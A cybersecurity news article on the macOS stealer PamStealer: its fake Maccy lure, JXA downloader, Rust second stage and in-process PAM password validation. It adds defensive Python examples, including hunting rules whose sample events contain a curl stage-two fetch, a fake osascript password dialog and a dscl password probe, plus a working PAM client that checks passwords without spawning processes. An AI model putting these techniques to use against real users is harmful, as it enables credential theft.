
PamStealer: New macOS Malware Evades Detection with Stealthy Tactics

Researchers have identified "PamStealer," a new macOS malware that validates a phished login password locally through Pluggable Authentication Modules (PAM) rather than by spawning helper processes, so the credential theft leaves far less process telemetry for defenders than typical macOS stealers do.

Joshua Ramos
Joshua Ramos covers cybersecurity for Techawave.

A new strain of macOS malware, dubbed PamStealer, has been documented by researchers at Jamf, a firm specializing in macOS security. It steals user credentials through a two-stage infection chain whose first stage is disguised as a legitimate clipboard manager for the Mac, and it avoids several of the process-level behaviors that common detection logic relies on.

PamStealer takes its name from its use of macOS's built-in Pluggable Authentication Modules (PAM) interface, the same library that login, sudo and the screen lock use to check a password. The malware calls it in-process to confirm that a captured password is correct before sending it to an attacker-controlled server. Commodity macOS stealers usually verify a phished password by spawning a helper such as dscl, security or osascript; checking through PAM instead produces no child process, which is a large part of why the routine is so hard to spot.

The attack begins with a disk image posing as "Maccy," a popular clipboard management tool. Opening the image presents an AppleScript that the user is instructed to open in the macOS Script Editor and run. That script is the first stage. Rather than shelling out to command-line tools such as `curl` or `zsh`, it runs a self-contained JavaScript for Automation (JXA) downloader that uses native Objective-C APIs, reached through the JXA Objective-C bridge, to retrieve and stage the second-stage payload.

A Quieter Execution Chain for Maximum Stealth

The layering of a disk-image lure, an AppleScript and a JXA downloader with the network code done through native APIs means no shell or download utility ever appears as a child process of Script Editor, which is what most macOS stealer detections key on. "Rather than relying on shell commands such as curl or zsh, the AppleScript executes a self-contained JavaScript for Automation (JXA) downloader that retrieves and stages the payload using native Objective-C APIs," the Jamf researchers explained. "Combined with a Rust-based second stage and a password capture workflow that validates credentials locally through PAM, the result is a quieter execution chain than we typically observe in commodity macOS stealers."

A second evasion concerns the `com.apple.quarantine` extended attribute. Files downloaded from the internet carry this attribute, and Gatekeeper inspects quarantined apps and executables when they are launched, warning the user or blocking them outright. PamStealer's first stage never launches a quarantined executable: the malicious logic is a script opened as a document in Script Editor, Apple's own signed application, and the user is told to press Command-R, which runs the script inside Script Editor's process. The attribute is still present on the disk image, but nothing in the first stage ever triggers the check that would surface it.
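For incident responders, the quarantine attribute is still worth reading even when it failed to stop anything, because it records which application downloaded the file and when. The helper below is an added example (not Jamf's or the malware's code) that parses the raw attribute value, whose layout is `<flags hex>;<unix time hex>;<downloading agent>;<event UUID>`, and reads it from a file with the macOS `xattr` tool where that tool exists. The sample value is constructed, not taken from a real PamStealer image.

```python
"""Triage helper for the com.apple.quarantine extended attribute.

The attribute value is a semicolon-separated record:
    <flags-hex>;<unix-time-hex>;<downloading agent>;<event UUID>
The UUID is the key into ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2,
where LaunchServices keeps the originating URL of the download.
"""
import shutil
import subprocess
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional


@dataclass
class QuarantineRecord:
    flags: int              # LaunchServices quarantine flags (bit meanings vary by macOS version)
    downloaded_at: datetime  # when the downloading app wrote the attribute (UTC)
    agent: str              # name of the app that downloaded the file, e.g. "Safari"
    event_id: str           # UUID of the QuarantineEventsV2 row holding the origin URL


def parse_quarantine(value: str) -> QuarantineRecord:
    """Parse a raw com.apple.quarantine value as printed by `xattr -p`."""
    parts = value.strip().split(";")
    if len(parts) < 3:
        raise ValueError(f"unexpected quarantine value: {value!r}")
    flags = int(parts[0], 16)
    # The second field is seconds since the Unix epoch, written in hex.
    downloaded_at = datetime.fromtimestamp(int(parts[1], 16), tz=timezone.utc)
    event_id = parts[3] if len(parts) > 3 else ""
    return QuarantineRecord(flags, downloaded_at, parts[2], event_id)


def read_quarantine(path: str) -> Optional[QuarantineRecord]:
    """Return the parsed attribute for `path`, or None if the file carries none.

    Uses the macOS `xattr` command; on a platform without it, returns None.
    """
    if shutil.which("xattr") is None:
        return None
    proc = subprocess.run(["xattr", "-p", "com.apple.quarantine", path],
                          capture_output=True, text=True)
    if proc.returncode != 0 or not proc.stdout.strip():
        return None  # attribute absent, or file unreadable
    return parse_quarantine(proc.stdout)


# Constructed sample value, in the layout macOS writes; not from a real sample.
SAMPLE_VALUE = "0083;6650a1b2;Safari;2F9C1D4E-0A1B-4C2D-9E3F-5A6B7C8D9E0F"


if __name__ == "__main__":
    import sys
    rec = read_quarantine(sys.argv[1]) if len(sys.argv) > 1 else parse_quarantine(SAMPLE_VALUE)
    if rec is None:
        print("no com.apple.quarantine attribute")
    else:
        print(f"downloaded by {rec.agent} at {rec.downloaded_at:%Y-%m-%d %H:%M:%S} UTC, "
              f"flags=0x{rec.flags:04x}, event={rec.event_id}")
```

Run it against the mounted disk image or the downloaded `.dmg` itself (`python3 quarantine_triage.py Maccy.dmg`) to recover the download agent and time for the timeline; the event UUID can then be looked up in the QuarantineEventsV2 database for the source URL.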

The second stage is a lean executable written in Rust, a language still uncommon among macOS infostealers and one whose binaries analysts and signature sets encounter less often. It poses as a legitimate macOS component such as `Finder.app` or `Software Update.app`, complete with genuine macOS icons, and it harvests data by reading SQLite database files directly, the format in which browsers and many applications keep cookies, history and saved logins, rather than going through any helper tool.
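The combination described above changes what a defender can hunt for. The rules below, an added example that is not part of Jamf's report, run over constructed process events in the shape an EDR or Endpoint Security client reports (pid, parent pid, name, path, arguments). Two rules catch the noisy commodity chain the article contrasts PamStealer with: Script Editor spawning `curl`, `zsh` or `osascript`, and a helper such as `dscl . -authonly` or an osascript `display dialog ... with hidden answer` being used to phish and check a password. Neither fires on the PamStealer-like event. What does fire is the third rule, which checks that a process calling itself Finder or Software Update actually runs from those components' real homes under `/System/Library/CoreServices/`. All events and paths below are made up for the example.

```python
"""Hunting rules for the macOS stealer behaviours discussed above,
exercised on constructed process events (none of this is real telemetry)."""
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    name: str                                # process name as the sensor reports it
    path: str                                # on-disk executable path
    args: List[str] = field(default_factory=list)


# Where the system components that PamStealer's stage two imitates really live.
SYSTEM_HOMES: Dict[str, str] = {
    "Finder": "/System/Library/CoreServices/Finder.app/",
    "Software Update": "/System/Library/CoreServices/Software Update.app/",
}

# Binaries a script run in Script Editor should have no reason to spawn.
SCRIPT_EDITOR_SUSPECT_CHILDREN = {"curl", "zsh", "sh", "bash", "osascript"}


def find_masquerades(events: List[ProcEvent]) -> List[ProcEvent]:
    """Processes named like a system component but executing from elsewhere."""
    return [e for e in events
            if e.name in SYSTEM_HOMES and not e.path.startswith(SYSTEM_HOMES[e.name])]


def find_password_probe_helpers(events: List[ProcEvent]) -> List[ProcEvent]:
    """Helper processes commodity stealers spawn to phish or verify a password.

    `dscl . -authonly <user> <pw>` checks a password against Open Directory;
    `osascript ... display dialog ... with hidden answer` is the classic fake prompt.
    (The `security` tool is also used for this, but its subcommands vary too much
    for a single reliable argument match, so it is left out here.)
    """
    hits = []
    for e in events:
        if e.name == "dscl" and "-authonly" in e.args:
            hits.append(e)
        elif e.name == "osascript" and "hidden answer" in " ".join(e.args):
            hits.append(e)
    return hits


def find_script_editor_children(events: List[ProcEvent]) -> List[ProcEvent]:
    """Script Editor spawning shells or download tools: the noisy delivery chain."""
    by_pid = {e.pid: e for e in events}
    return [e for e in events
            if e.ppid in by_pid and by_pid[e.ppid].name == "Script Editor"
            and e.name in SCRIPT_EDITOR_SUSPECT_CHILDREN]


# Constructed events. 100-103 model a commodity stealer run from Script Editor;
# 200 models a PamStealer-like stage two (misplaced "Finder", no helper children);
# 300 is the genuine Finder and must not be flagged.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "Script Editor",
              "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"),
    ProcEvent(101, 100, "curl", "/usr/bin/curl", ["curl", "-s", "http://example.invalid/stage2"]),
    ProcEvent(102, 100, "osascript", "/usr/bin/osascript",
              ["osascript", "-e", 'display dialog "Enter password" default answer "" with hidden answer']),
    ProcEvent(103, 102, "dscl", "/usr/bin/dscl", ["dscl", ".", "-authonly", "victim", "hunter2"]),
    ProcEvent(200, 1, "Finder",
              "/Users/victim/Library/Application Support/Maccy/Finder.app/Contents/MacOS/Finder"),
    ProcEvent(300, 1, "Finder", "/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder"),
]


def pids(events: List[ProcEvent]) -> List[int]:
    return [e.pid for e in events]


if __name__ == "__main__":
    print("masquerades:          ", pids(find_masquerades(SAMPLE_EVENTS)))
    print("password probe helpers:", pids(find_password_probe_helpers(SAMPLE_EVENTS)))
    print("Script Editor children:", pids(find_script_editor_children(SAMPLE_EVENTS)))
```

The point of the sample is the gap it exposes: the PamStealer-like process (pid 200) is invisible to the two process-chain rules and is caught only because its name and path disagree. Path-versus-name checks for impersonated system components are cheap and should be in any macOS ruleset.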

PamStealer's credential capture is the part that most distinguishes it. It shows a native-looking password prompt styled as a system authorization request, reading "Maccy wants to make changes. Enter your password to allow this." The entered password is then checked in-process through the PAM API. "This check is done entirely through PAM: there is no call out to dscl, security, osascript or any spawned process to verify the password, as many commodity macOS stealers do," the Jamf report noted. "The result is a quieter routine that keeps only a verified password, and one fewer process chain for defenders to detect on." If the password fails validation the prompt simply reappears, so the malware ends up holding only a password PAM has confirmed. Once validation succeeds, a fake message claims the file is damaged and cannot be installed, closing the interaction so the victim has no reason to suspect anything happened.
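To see why this leaves nothing in process telemetry, it helps to look at what a PAM client actually does. The program below is an added example, written for this article and not taken from Jamf's report or from the malware: it drives the documented libpam client calls (`pam_start`, `pam_authenticate`, `pam_end`) from Python through ctypes, with a conversation callback that answers the module's password prompt. This is the same sequence loginwindow, the screen lock and sudo go through, so the PAM call itself is not an indicator; everything happens inside the calling process, which is the article's point. The service name `login` is an assumption (it exists in `/etc/pam.d` on macOS, but the report does not say which service the malware uses), and the callback's decision logic is split into a pure function so it can be exercised without libpam.

```python
"""Minimal PAM client via ctypes: verifies a local account password
using only libpam, with no child process (added example, not the malware's code)."""
import ctypes
import ctypes.util
import getpass
import sys

# Conversation message styles from <security/pam_appl.h>; same values in
# OpenPAM (macOS) and Linux-PAM.
PAM_PROMPT_ECHO_OFF = 1   # "Password:" -- reply with the secret
PAM_PROMPT_ECHO_ON = 2    # visible prompt, e.g. a username
PAM_ERROR_MSG = 3         # display only, no reply
PAM_TEXT_INFO = 4         # display only, no reply
PAM_SUCCESS = 0
PAM_BUF_ERR = 5


class PamMessage(ctypes.Structure):
    _fields_ = [("msg_style", ctypes.c_int), ("msg", ctypes.c_char_p)]


class PamResponse(ctypes.Structure):
    # resp is a void pointer on purpose: PAM frees it with free(), so it must
    # come from the C allocator rather than a ctypes-managed buffer.
    _fields_ = [("resp", ctypes.c_void_p), ("resp_retcode", ctypes.c_int)]


CONV_FUNC = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_int,
                             ctypes.POINTER(ctypes.POINTER(PamMessage)),
                             ctypes.POINTER(ctypes.POINTER(PamResponse)),
                             ctypes.c_void_p)


class PamConv(ctypes.Structure):
    _fields_ = [("conv", CONV_FUNC), ("appdata_ptr", ctypes.c_void_p)]


def answer_prompts(styles, password, username=""):
    """Decide the reply for each message style PAM sends through the callback.

    Only PAM_PROMPT_ECHO_OFF gets the password; PAM_PROMPT_ECHO_ON gets the
    username; error/info messages get no reply (None). Pure Python, no libpam.
    """
    replies = []
    for style in styles:
        if style == PAM_PROMPT_ECHO_OFF:
            replies.append(password)
        elif style == PAM_PROMPT_ECHO_ON:
            replies.append(username)
        else:
            replies.append(None)
    return replies


def _make_conv(password, username):
    libc = ctypes.CDLL(None)  # the running process's libc (libSystem on macOS)
    libc.calloc.restype = ctypes.c_void_p
    libc.calloc.argtypes = [ctypes.c_size_t, ctypes.c_size_t]
    libc.strdup.restype = ctypes.c_void_p
    libc.strdup.argtypes = [ctypes.c_char_p]

    def conv(num_msg, msgs, resp, appdata):
        styles = [msgs[i].contents.msg_style for i in range(num_msg)]
        block = libc.calloc(num_msg, ctypes.sizeof(PamResponse))
        if not block:
            return PAM_BUF_ERR
        arr = ctypes.cast(block, ctypes.POINTER(PamResponse))
        for i, reply in enumerate(answer_prompts(styles, password, username)):
            if reply is not None:
                arr[i].resp = libc.strdup(reply.encode())
        resp[0] = arr           # *resp = array; PAM takes ownership
        return PAM_SUCCESS

    return CONV_FUNC(conv)


def verify_password(username, password, service="login"):
    """Return (ok, pam_message). Only libpam is touched; nothing is spawned."""
    libname = ctypes.util.find_library("pam")
    if libname is None:
        raise OSError("libpam not found on this host")
    pam = ctypes.CDLL(libname)
    pam.pam_start.argtypes = [ctypes.c_char_p, ctypes.c_char_p,
                              ctypes.POINTER(PamConv), ctypes.POINTER(ctypes.c_void_p)]
    pam.pam_authenticate.argtypes = [ctypes.c_void_p, ctypes.c_int]
    pam.pam_end.argtypes = [ctypes.c_void_p, ctypes.c_int]
    pam.pam_strerror.argtypes = [ctypes.c_void_p, ctypes.c_int]
    pam.pam_strerror.restype = ctypes.c_char_p

    callback = _make_conv(password, username)      # keep alive for the whole exchange
    conv = PamConv(callback, None)
    handle = ctypes.c_void_p()
    rc = pam.pam_start(service.encode(), username.encode(), ctypes.byref(conv), ctypes.byref(handle))
    if rc != PAM_SUCCESS:
        return False, pam.pam_strerror(handle, rc).decode()
    rc = pam.pam_authenticate(handle, 0)
    message = pam.pam_strerror(handle, rc).decode()
    pam.pam_end(handle, rc)
    return rc == PAM_SUCCESS, message


if __name__ == "__main__":
    user = sys.argv[1] if len(sys.argv) > 1 else getpass.getuser()
    ok, msg = verify_password(user, getpass.getpass(f"Password for {user}: "))
    print("verified" if ok else f"rejected: {msg}")
```

Run `python3 pam_check.py <user>` on a Mac and watch the process tree while the prompt is open: the password is checked with no `dscl`, `security` or `osascript` child. Since legitimate software does exactly this, a detection has to come from context instead, for example an unsigned or ad-hoc-signed binary outside `/System` that both loads libpam and draws an authorization-style dialog.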

Beyond the password itself, PamStealer tries to maximize what it can exfiltrate. It may request Full Disk Access for the fake Maccy application, which would let it read protected user data, and it contains code aimed at cryptocurrency accounts, Ethereum among them. Taken together, the native scripting-based delivery, the PAM-based local validation and the broad data harvesting show macOS threats moving toward quieter execution chains built on native implementations, and those chains give traditional process-centric detection much less to work with.
